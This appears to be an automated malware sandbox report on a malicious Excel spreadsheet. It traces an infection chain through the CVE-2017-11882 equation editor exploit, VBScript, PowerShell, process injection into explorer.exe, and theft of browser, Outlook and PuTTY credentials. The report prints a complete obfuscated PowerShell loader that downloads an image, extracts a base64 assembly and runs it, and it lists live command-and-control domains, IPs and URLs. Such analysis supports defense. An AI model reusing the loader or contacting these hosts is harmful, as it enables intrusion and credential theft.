rebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredgdgtrenqdgtrevdgtredcdgtremgdgtrewdgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredydgtremwdgtrewdgtredcdgtrengdgtrezdgtredqdgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links | get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.gbr/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','regasm',''))} }"Jump to behavior
            Source: explorer.exe, 0000000E.00000002.618110460.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.471758119.00000000001D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman-
            Source: explorer.exe, 0000000E.00000000.471840125.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000002.618618014.0000000000720000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: explorer.exe, 0000000E.00000000.471840125.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000002.618618014.0000000000720000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 0000000E.00000000.471840125.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000002.618618014.0000000000720000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: !Progman
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_000D55EB cpuid 18_2_000D55EB
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\rugtucwQueries volume information: C:\Users\user\AppData\Roaming\rugtucw VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_00082112 GetSystemTimeAsFileTime,_alldiv,wsprintfA,18_2_00082112
            Source: C:\Windows\explorer.exeCode function: 14_2_026E3490 GetUserNameW,14_2_026E3490
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_00082198 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary,18_2_00082198
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000018.00000002.618080240.0000000000081000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000002.617958525.0000000000061000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3976, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4068, type: MEMORYSTR
            Source: Yara matchFile source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000D.00000002.473315966.00000000000A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.473503358.0000000000181000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.619042204.00000000026E1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\storage\permanent\moz-safe-about+home\.metadata-v2
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\xulstore.json
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\datareporting\state.json
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\storage.sqlite
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\compatibility.ini
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\content-prefs.sqlite
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\storage\permanent\chrome\.metadata-v2
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\search.json.mozlz4
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\jetpack\@all-aboard-v1-6\simple-storage\store.json
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\mimeTypes.rdf
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\storage\permanent\chrome\.metadata
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\permissions.sqlite
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqlite
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\datareporting\session-state.json
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\datareporting\archived\2017-10\1508238380992.d07fbb40-1c13-49f0-9742-db90c57c7811.main.jsonlz4
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\SiteSecurityServiceState.txt
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\storage\permanent\moz-safe-about+home\.metadata
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\addons.json
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\SecurityPreloadState.txt
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\saved-telemetry-pings\d07fbb40-1c13-49f0-9742-db90c57c7811
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\prefs.js
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\times.json
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.sqlite
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\containers.json
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\AlternateServices.txt
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\pluginreg.dat
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\webappsstore.sqlite
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\parent.lock
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\blocklist.xml
            Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents
            Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents
            Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
            Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000018.00000002.618080240.0000000000081000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000002.617958525.0000000000061000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3976, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4068, type: MEMORYSTR
            Source: Yara matchFile source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000D.00000002.473315966.00000000000A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.473503358.0000000000181000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.619042204.00000000026E1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information121
            Scripting
            Valid Accounts11
            Native API
            121
            Scripting
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            1
            OS Credential Dumping
            1
            System Time Discovery
            Remote Services1
            Archive Collected Data
            1
            Web Service
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts53
            Exploitation for Client Execution
            1
            DLL Side-Loading
            623
            Process Injection
            1
            Deobfuscate/Decode Files or Information
            11
            Input Capture
            1
            Account Discovery
            Remote Desktop Protocol11
            Data from Local System
            4
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts11
            Command and Scripting Interpreter
            Logon Script (Windows)Logon Script (Windows)21
            Obfuscated Files or Information
            1
            Credentials in Registry
            13
            File and Directory Discovery
            SMB/Windows Admin Shares1
            Email Collection
            21
            Encrypted Channel
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts3
            PowerShell
            Login HookLogin Hook1
            Install Root Certificate
            NTDS27
            System Information Discovery
            Distributed Component Object Model11
            Input Capture
            4
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading
            LSA Secrets331
            Security Software Discovery
            SSHKeylogging115
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            File Deletion
            Cached Domain Credentials141
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
            Masquerading
            DCSync13
            Process Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Modify Registry
            Proc Filesystem1
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt141
            Virtualization/Sandbox Evasion
            /etc/passwd and /etc/shadow1
            System Owner/User Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron623
            Process Injection
            Network Sniffing1
            Remote System Discovery
            Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
            Hidden Files and Directories
            Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1448373 Sample: #20240627_Edlen_B.xls Startdate: 28/05/2024 Architecture: WINDOWS Score: 100 71 z2.ink 2->71 91 Snort IDS alert for network traffic 2->91 93 Multi AV Scanner detection for domain / URL 2->93 95 Found malware configuration 2->95 97 22 other signatures 2->97 12 EXCEL.EXE 57 31 2->12         started        16 taskeng.exe 1 2->16         started        signatures3 process4 dnsIp5 81 198.46.177.156, 49164, 49169, 49172 AS-COLOCROSSINGUS United States 12->81 83 z2.ink 54.241.153.192, 49163, 49165, 49166 AMAZON-02US United States 12->83 65 lionsarebeautifult...ionbeautiufl[1].doc, ISO-8859 12->65 dropped 18 wscript.exe 11 12->18         started        22 WINWORD.EXE 339 33 12->22         started        25 rugtucw 16->25         started        file6 process7 dnsIp8 73 paste.ee 18->73 75 uploaddeimagens.com.br 188.114.97.3, 443, 49174, 49175 CLOUDFLARENETUS European Union 18->75 99 System process connects to network (likely due to code injection or exploit) 18->99 101 Suspicious powershell command line found 18->101 103 Wscript starts Powershell (via cmd or directly) 18->103 113 5 other signatures 18->113 27 powershell.exe 4 18->27         started        77 z2.ink 22->77 55 C:\Users\user\AppData\Roaming\...\zBOD.url, MS 22->55 dropped 57 C:\Users\user\AppData\Roaming\...\z2.ink.url, MS 22->57 dropped 59 ~WRF{E5BBB120-EEF3...2-2B0745709A9C}.tmp, Composite 22->59 dropped 61 C:\Users\user\AppData\Local\...\6619CBCE.doc, ISO-8859 22->61 dropped 105 Microsoft Office launches external ms-search protocol handler (WebDAV) 22->105 107 Office viewer loads remote template 22->107 109 Microsoft Office drops suspicious files 22->109 30 EQNEDT32.EXE 12 22->30         started        file9 111 Connects to a pastebin service (likely for C&C) 73->111 signatures10 process11 file12 131 Suspicious powershell command line found 27->131 133 Suspicious execution chain found 27->133 33 powershell.exe 12 5 27->33         started        67 C:\Users\...\lionarekingofjungleimageshes.vbs, Unicode 30->67 dropped 135 Office equation editor establishes network connection 30->135 137 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 30->137 signatures13 process14 dnsIp15 69 uploaddeimagens.com.br 33->69 87 Writes to foreign memory regions 33->87 89 Injects a PE file into a foreign processes 33->89 37 RegAsm.exe 33->37         started        signatures16 process17 signatures18 115 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 37->115 117 Maps a DLL or memory area into another process 37->117 119 Checks if the current machine is a virtual machine (disk enumeration) 37->119 121 Creates a thread in another existing process (thread injection) 37->121 40 explorer.exe 3 2 37->40 injected process19 dnsIp20 79 prolinice.ga 77.232.129.190, 49178, 49179, 80 BSTV-ASRU Russian Federation 40->79 63 C:\Users\user\AppData\Roaming\rugtucw, PE32 40->63 dropped 123 Benign windows process drops PE files 40->123 125 Injects code into the Windows Explorer (explorer.exe) 40->125 127 Writes to foreign memory regions 40->127 129 Hides that the sample has been downloaded from the Internet (zone.identifier) 40->129 45 explorer.exe 6 40->45         started        49 explorer.exe 40->49         started        51 explorer.exe 40->51         started        53 6 other processes 40->53 file21 signatures22 process23 dnsIp24 85 prolinice.ga 45->85 139 System process connects to network (likely due to code injection or exploit) 45->139 141 Found evasive API chain (may stop execution after checking mutex) 45->141 143 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 45->143 147 3 other signatures 45->147 145 Tries to harvest and steal browser information (history, passwords, etc) 49->145 signatures25

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            #20240627_Edlen_B.xls16%ReversingLabsDocument-Excel.Trojan.Heuristic
            #20240627_Edlen_B.xls8%VirustotalBrowse
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{E5BBB120-EEF3-40B5-B932-2B0745709A9C}.tmp100%AviraEXP/CVE-2017-11882.Gen
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6619CBCE.doc100%AviraHEUR/Rtf.Malformed
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl[1].doc100%AviraHEUR/Rtf.Malformed
            C:\Users\user\AppData\Roaming\rugtucw0%ReversingLabs
            No Antivirus matches
            SourceDetectionScannerLabelLink
            paste.ee3%VirustotalBrowse
            z2.ink7%VirustotalBrowse
            uploaddeimagens.com.br5%VirustotalBrowse
            prolinice.ga4%VirustotalBrowse
            SourceDetectionScannerLabelLink
            http://ocsp.entrust.net030%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
            https://analytics.paste.ee0%URL Reputationsafe
            http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://nuget.org/nuget.exe0%URL Reputationsafe
            http://ocsp.entrust.net0D0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://secure.gravatar.com0%URL Reputationsafe
            http://nuget.org/NuGet.exe0%URL Reputationsafe
            http://crl.entrust.net/server1.crl00%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            http://java.sun.com0%URL Reputationsafe
            http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
            http://198.46.177.156/9090/lionsarekingofjungleimageshere.bmpCa0%Avira URL Cloudsafe
            http://prolinice.ga/ndex.php0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            https://paste.ee/d/oTxeD0%Avira URL Cloudsafe
            https://support.mozilla.org0%URL Reputationsafe
            https://secure.comodo.com/CPS00%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://themes.googleusercontent.com0%URL Reputationsafe
            http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
            http://198.46.177.156/8080/RBG.txt0%Avira URL Cloudsafe
            https://www.google.com0%Avira URL Cloudsafe
            https://paste.ee/d/oTxeD3%VirustotalBrowse
            https://paste.ee/d/oTxeDg0%Avira URL Cloudsafe
            https://paste.ee/1%VirustotalBrowse
            http://198.46.177.156/8080/RBG.txt8%VirustotalBrowse
            https://paste.ee/0%Avira URL Cloudsafe
            http://www.autoitscript.com/autoit30%VirustotalBrowse
            https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
            https://duckduckgo.com/ac/?q=0%VirustotalBrowse
            http://prolinice.ga/ndex.php1%VirustotalBrowse
            https://www.google.com0%VirustotalBrowse
            http://www.autoitscript.com/autoit30%Avira URL Cloudsafe
            http://prolinice.ga/index.php0%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com;0%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com0%Avira URL Cloudsafe
            http://z2.ink/0%Avira URL Cloudsafe
            http://vilendar.ga/index.php100%Avira URL Cloudmalware
            http://www.piriform.com/ccleanerxe0%Avira URL Cloudsafe
            http://z2.ink/zBOD0%Avira URL Cloudsafe
            https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634100%Avira URL Cloudmalware
            http://198.46.177.156/xampp/msdc/ms/lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl.doc0%Avira URL Cloudsafe
            http://z2.ink/7%VirustotalBrowse
            http://prolinice.ga/index.php12%VirustotalBrowse
            https://cdnjs.cloudflare.com0%VirustotalBrowse
            http://vilendar.ga/index.php7%VirustotalBrowse
            http://z2.ink/zBOD6%VirustotalBrowse
            http://prolinice.ga/0%Avira URL Cloudsafe
            http://z2.ink/zBODyX0%Avira URL Cloudsafe
            https://www.google.com;0%Avira URL Cloudsafe
            https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?171630763413%VirustotalBrowse
            http://198.46.177.156/xampp/msdc/ms/lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl.doc8%VirustotalBrowse
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            http://198.46.177.156/9090/lionsarekingofjungleimageshere.bmpj0%Avira URL Cloudsafe
            https://www.google.com/favicon.ico0%Avira URL Cloudsafe
            http://prolinice.ga/index.php10%Avira URL Cloudsafe
            http://z2.ink/zBODyX6%VirustotalBrowse
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
            https://uploaddeimagens.com.br/images/000%Avira URL Cloudsafe
            http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv0%Avira URL Cloudsafe
            http://prolinice.ga/4%VirustotalBrowse
            http://mbhaudjprbp.net/application/x-www-form-urlencodedMozilla/5.00%Avira URL Cloudsafe
            https://www.google.com/favicon.ico0%VirustotalBrowse
            https://uploaddeimagens.com.br0%Avira URL Cloudsafe
            http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.00%Avira URL Cloudsafe
            https://analytics.paste.ee;0%Avira URL Cloudsafe
            https://paste.ee/d/oTxeDbZ~A0%Avira URL Cloudsafe
            https://uploaddeimagens.com.br/images/003%VirustotalBrowse
            http://198.46.177.156/9090/lionsarekingofjungleimageshere.bmp0%Avira URL Cloudsafe
            http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.01%VirustotalBrowse
            https://uploaddeimagens.com.br7%VirustotalBrowse
            http://www.piriform.com/ccleaner0%Avira URL Cloudsafe
            https://paste.ee/d/oTxeD90%Avira URL Cloudsafe
            http://prolinice.ga/index.phpMozilla/5.00%Avira URL Cloudsafe
            http://198.46.177.156/9090/lionsarekingofjungleimageshere.bmp8%VirustotalBrowse
            https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%Avira URL Cloudsafe
            http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv0%VirustotalBrowse
            http://www.piriform.com/ccleaner0%VirustotalBrowse
            http://mbhaudjprbp.net/0%Avira URL Cloudsafe
            http://prolinice.ga/index.phpMozilla/5.01%VirustotalBrowse
            NameIPActiveMaliciousAntivirus DetectionReputation
            paste.ee
            188.114.97.3
            truetrueunknown
            z2.ink
            54.241.153.192
            truetrueunknown
            uploaddeimagens.com.br
            188.114.97.3
            truetrueunknown
            prolinice.ga
            77.232.129.190
            truetrueunknown
            NameMaliciousAntivirus DetectionReputation
            https://paste.ee/d/oTxeDtrue
            • 3%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://198.46.177.156/8080/RBG.txttrue
            • 8%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://prolinice.ga/index.phptrue
            • 12%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://vilendar.ga/index.phptrue
            • 7%, Virustotal, Browse
